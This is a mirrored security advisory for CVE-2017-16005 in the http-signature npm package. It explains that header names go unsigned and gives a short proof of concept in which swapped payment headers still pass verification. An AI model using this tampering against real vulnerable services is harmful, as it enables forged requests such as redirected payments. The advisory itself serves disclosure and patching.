Ecosyste.ms: Advisories

Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXEyNTctdnY0cC1mZzky

Header Forgery in http-signature

Affected versions of http-signature contain a vulnerability which can allow an attacker in a privileged network position to modify header names and change the meaning of the request, without requiring an updated signature.

This problem occurs because vulnerable versions of http-signature sign the contents of headers, but not the header names.

Proof of Concept

Consider this to be the initial, untampered request:

POST /pay HTTP/1.1
Host: example.com
Date: Thu, 05 Jan 2012 21:31:40 GMT
X-Payment-Source: [email protected]
X-Payment-Destination: [email protected]
Authorization: Signature keyId="Test",algorithm="rsa-sha256",headers="x-payment-source x-payment-destination" MDyO5tSvin5...

And the request is intercepted and tampered as follows:

X-Payment-Source: [email protected] // Emails switched
X-Payment-Destination: [email protected]
Authorization: Signature keyId="Test",algorithm="rsa-sha256",headers="x-payment-destination x-payment-source" MDyO5tSvin5...

In the resulting responses, both requests would pass signature verification without issue.

[email protected]\n
[email protected]\n

Recommendation

Update to version 0.10.0 or higher.

Permalink: https://github.com/advisories/GHSA-q257-vv4p-fg92
JSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXEyNTctdnY0cC1mZzky
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: about 6 years ago
Updated: about 1 year ago

CVSS Score: 7.5
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Identifiers: GHSA-q257-vv4p-fg92, CVE-2017-16005
References:

• https://nvd.nist.gov/vuln/detail/CVE-2017-16005
• https://github.com/joyent/node-http-signature/issues/10
• https://github.com/advisories/GHSA-q257-vv4p-fg92
• https://www.npmjs.com/advisories/318

Repository: https://github.com/joyent/node-http-signature
Blast Radius: 44.7

Affected Packages